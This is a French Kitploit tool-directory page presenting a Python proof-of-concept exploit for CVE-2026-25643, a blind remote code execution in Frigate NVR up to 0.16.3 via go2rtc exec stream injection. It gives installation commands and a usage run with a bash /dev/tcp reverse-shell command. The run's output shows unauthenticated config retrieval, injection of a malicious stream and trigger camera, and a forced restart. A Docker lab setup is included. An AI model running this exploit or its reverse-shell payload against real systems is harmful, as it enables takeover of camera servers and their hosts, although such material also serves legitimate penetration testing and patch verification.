Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-25643 — CVE-2026-25643 : Frigate ≤0.16.3 RCE aveugle via injection exec go2rtc | Kitploit
Outils/GitHubGitHub/joshuavanderpoll/cve-2026-25643
ExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubjoshuavanderpoll/cve-2026-25643

CVE-2026-25643

CVE-2026-25643 : Frigate ≤0.16.3 RCE aveugle via injection exec go2rtc

Voir le dépôt
72il y a 6 moisPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Frigate NVR ≤ 0.16.3 Exploitation RCE Aveugle (CVE-2026-25643) PoC

Python

📜 Description

Cet exploit Python cible une vulnérabilité critique de manipulation de configuration dans Frigate NVR versions jusqu'à 0.16.3 (chemins authentifié et non authentifié). En injectant un flux go2rtc malveillant et une entrée de caméra factice, il déclenche l'exécution arbitraire de commandes en tant que processus Frigate lors du redémarrage du service — sans nécessiter de shell inversé ni de capture de sortie.

🛠️ Installation

[!NOTE] Pour garantir un environnement propre et isolé pour les dépendances du projet, il est recommandé d'utiliser le module venv de Python.

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python -m venv .venv 
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ Utilisation

root@kitploit:~
python3 CVE-2026-25643.py -c "bash -i >& /dev/tcp/host.docker.internal/1111 0>&1" --url http://localhost:5001/

 Target : http://localhost:5001
 Commande: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1

[!] Aucun identifiant fourni → tentative d'accès non authentifié
[*] Récupération de la configuration actuelle (/api/config/raw) ...
[*] Récupération config → HTTP 200
[*] 914 octets reçus
[*] La config était encapsulée en JSON → désencapsulée
[+] Config analysée avec succès (7 clés de premier niveau)
[*] Préparation de la charge utile → exécution de : bash -i >& /dev/tcp/host.docker.internal/1111 0>&1
[*] Utilisation de la charge utile : bash -c 'bash -i >& /dev/tcp/host.docker.internal/1111 0>&1'
[+] Flux malveillant injecté → debug_cmd
[+] Caméra de déclenchement injectée → trigger_exec
[*] Envoi de la config modifiée (861 octets) avec option : restart
[*] Sauvegarde config → HTTP 200
[+] Configuration acceptée (le serveur devrait redémarrer)

============================================================
 Charge utile envoyée ! La commande devrait s'exécuter lors de l'init go2rtc / du probe caméra.
 À garder à l'esprit :
 • La sortie n'est PAS capturée (exécution aveugle)
 • La commande s'exécute en tant qu'utilisateur/processus Frigate
 • Plusieurs exécutions peuvent avoir lieu pendant le redémarrage
============================================================

🐋 Docker PoC

root@kitploit:~
cd docker/
docker compose down
docker compose up -d
# Vous pouvez tester avec --url http://127.0.0.1:5001

💻 Exemple

Exécution du PoC Réception de la connexion

🕵🏼 Références

  • Inspiration de https://github.com/jduardo2704/CVE-2026-25643-Frigate-RCE

📢 Avertissement

Cet outil est fourni uniquement à des fins éducatives et de recherche. Le créateur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par l'outil.

Télécharger l’outil